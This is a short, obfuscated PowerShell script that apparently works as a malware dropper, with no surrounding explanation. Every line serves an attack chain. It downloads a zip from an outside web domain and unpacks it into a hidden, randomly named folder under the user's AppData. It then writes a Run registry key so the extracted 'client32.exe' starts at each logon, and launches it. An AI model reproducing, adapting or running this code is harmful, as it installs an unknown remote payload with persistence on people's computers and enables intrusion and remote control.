$SISPPGMGSYQ = "https://www.agenciacrabli.com/yszs.zip?lap=6867"
$WDPTSPOWDKTLJIMGMNOJ = (New-Object System.Net.WebClient).DownloadData($SISPPGMGSYQ)
$dffgds = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | ForEach-Object {[char]$_})
$DWDFWA = "$env:APPDATA\WinMedia\$dffgds"
if (-not (Test-Path $DWDFWA)) {
    New-Item -Path $DWDFWA -ItemType Directory -Force | Out-Null
}
$TLXIO = New-Object System.IO.MemoryStream
$TLXIO.Write($WDPTSPOWDKTLJIMGMNOJ, 0, $WDPTSPOWDKTLJIMGMNOJ.Length)
$TLXIO.Position = 0
Add-Type -AssemblyName System.IO.Compression
$MAUAPBZVHKW = New-Object System.IO.Compression.ZipArchive($TLXIO, [System.IO.Compression.ZipArchiveMode]::Read)
foreach ($TCAMTOEYEMJDYOGDGFXRPK in $MAUAPBZVHKW.Entries) {
    $EZBKPNQTIIRRVH = Join-Path $DWDFWA $TCAMTOEYEMJDYOGDGFXRPK.FullName
    $MJQTHGBVYBPIPHV = Split-Path $EZBKPNQTIIRRVH -Parent
    if (-not (Test-Path $MJQTHGBVYBPIPHV)) {
        New-Item -Path $MJQTHGBVYBPIPHV -ItemType Directory -Force | Out-Null
    }
    if ($TCAMTOEYEMJDYOGDGFXRPK.Length -gt 0) {
        $DYCEMQATJSEFPXPUCVWYE = $TCAMTOEYEMJDYOGDGFXRPK.Open()
        $WAGVEZICOFWL = [System.IO.File]::Create($EZBKPNQTIIRRVH)
        $DYCEMQATJSEFPXPUCVWYE.CopyTo($WAGVEZICOFWL)
        $WAGVEZICOFWL.Close()
        $DYCEMQATJSEFPXPUCVWYE.Close()
    }
}
$MAUAPBZVHKW.Dispose()
$TLXIO.Dispose()
$OAAUDFVSGNAGYO = "$DWDFWA\client32.exe"
sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run WindowApplication1 $OAAUDFVSGNAGYO
Start-Process $OAAUDFVSGNAGYO